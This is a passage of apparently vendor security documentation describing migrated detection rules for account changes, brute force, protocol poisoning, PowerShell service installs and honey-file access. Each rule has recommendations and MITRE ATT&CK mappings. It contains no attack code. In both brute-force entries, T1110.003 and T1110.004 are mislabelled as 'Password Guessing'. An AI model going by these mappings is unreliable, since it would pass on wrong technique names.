Migrated Legacy Rules
Copy link

This is a collection of rules that have been migrated from the Legacy UBA Detection Rules tab.

Attacker Technique - Protocol Poisoning

Description
Copy link

This detection identifies the poisoning of a network protocol.

Recommendation
Copy link

Investigate the poisoning host. Search for additional hosts that may have queried the poisoning host, as this alert will only fire once per poisoner address per day.

MITRE ATT&CK Techniques
Copy link

  • Adversary-in-the-Middle - T1557
  • LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001

Attacker Technique - Service Installed Executing PowerShell

Description
Copy link

This detection identifies services being installed with ‘powershell’ in the command line. This technique is used by malicious actors in order to perform execution of commands through a system service.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Command and Scripting Interpreter - T1059
  • PowerShell - T1059.001
  • System Services - T1569
  • Service Execution - T1569.002

Attacker Technique - Service Installed With Long Command Line

Description
Copy link

This detection identifies services being installed with a long string in the command line. This technique is used by malicious actors in order to perform execution of commands through a system service.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • System Services - T1569
  • Service Execution - T1569.002

File Access - Honey File Accessed

Description
Copy link

This detection identifies a user accessing a honey file. A honey file is a fake file located on a network file share. Honey files are designed to detect attackers who are accessing and potentially removing data from your network. Attackers will often find a file share on a network, zip the contents of the share into a folder, and dump the data for offline analysis.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

Lateral Movement - Administrator Impersonation

Description
Copy link

A user has authenticated to an administrator account.

Recommendation
Copy link

Investigate the source user of this event to verify if this activity is benign or expected. If it is expected, exceptions can be added for the source user. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Valid Accounts - T1078
  • Domain Accounts - T1078.002

Lateral Movement - Watched User Impersonation

Description
Copy link

A user has authenticated to a watched user’s account.

Recommendation
Copy link

Investigate the source user of this event to verify if this activity is benign or expected. If it is expected, exceptions can be added for the source user. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Domain Accounts - T1078.002

User Behavior - An Attempt Was Made To Reset An Account’s Password

Description
Copy link

An attempt was made to reset an account’s password.

Recommendation
Copy link

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724#security-monitoring-recommendations

MITRE ATT&CK Techniques
Copy link

  • Account Manipulation - T1098

User Behavior - A User Account Privilege Has Been Escalated

Description
Copy link

An administrator has assigned a higher level of privileges to the account.

Recommendation
Copy link

Investigate the subject user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732#security-monitoring-recommendations

MITRE ATT&CK Techniques
Copy link

  • Account Manipulation - T1098

User Behavior - A User Account Was Changed

Description
Copy link

A user account was changed.

Recommendation
Copy link

Investigate the subject user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738#security-monitoring-recommendations

MITRE ATT&CK Techniques
Copy link

  • Account Manipulation - T1098

User Behavior - A User Account Was Created

Description
Copy link

A new account has been created.

Recommendation
Copy link

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720#security-monitoring-recommendations

User Behavior - A User Account Was Enabled

Description
Copy link

A previously disabled user account has been re-enabled by an administrator.

Recommendation
Copy link

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4722#security-monitoring-recommendations

MITRE ATT&CK Techniques
Copy link

  • Account Manipulation - T1098

User Behavior - A User Account Was Locked Out

Description
Copy link

An account has been locked.

Recommendation
Copy link

Investigate the target user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4740#security-monitoring-recommendations

MITRE ATT&CK Techniques
Copy link

  • Account Access Removal - T1531

User Behavior - A User Account Was Unlocked

Description
Copy link

A previously locked user account has been unlocked by an administrator.

Recommendation
Copy link

Investigate the source user of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4767#security-monitoring-recommendations

User Behavior - A virus has been found on an asset

Description
Copy link

A virus has been found on an asset.

Recommendation
Copy link

Review the file that generated the alert.

MITRE ATT&CK Techniques
Copy link

  • Malicious File - T1204.002

User Behavior - An advanced malware system has generated an alert

Description
Copy link

An advanced malware system has generated an alert.

Recommendation
Copy link

Review the file or network traffic that generated the alert.

MITRE ATT&CK Techniques
Copy link

  • Malware - T1588.001

User Behavior - Brute Force Against Domain Account

Description
Copy link

A domain account has failed to authenticate to the same asset excessively.

Recommendation
Copy link

Investigate the source and destination domain account of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4648#security-monitoring-recommendations

MITRE ATT&CK Techniques
Copy link

  • Password Guessing - T1110.001
  • Password Guessing - T1110.003
  • Password Guessing - T1110.004

User Behavior - Brute Force Against Local Account

Description
Copy link

A local account has failed to authenticate to the same asset excessively.

Recommendation
Copy link

Investigate the source and destination local account of this event to verify if this activity is benign or expected. Review any other suspicious activity related to this user. If necessary, lock the account and have the user change their password.

For more information on this event, follow this link: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4648#security-monitoring-recommendations

MITRE ATT&CK Techniques
Copy link

  • Password Guessing - T1110.001
  • Password Guessing - T1110.003
  • Password Guessing - T1110.004

User Behavior - Exploit Mitigation has generated an alert

Description
Copy link

An exploit has been mitigated in a process.

Recommendation
Copy link

Investigate the process that was mitigated and verify if this activity is benign or expected. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Application or System Exploitation - T1499.004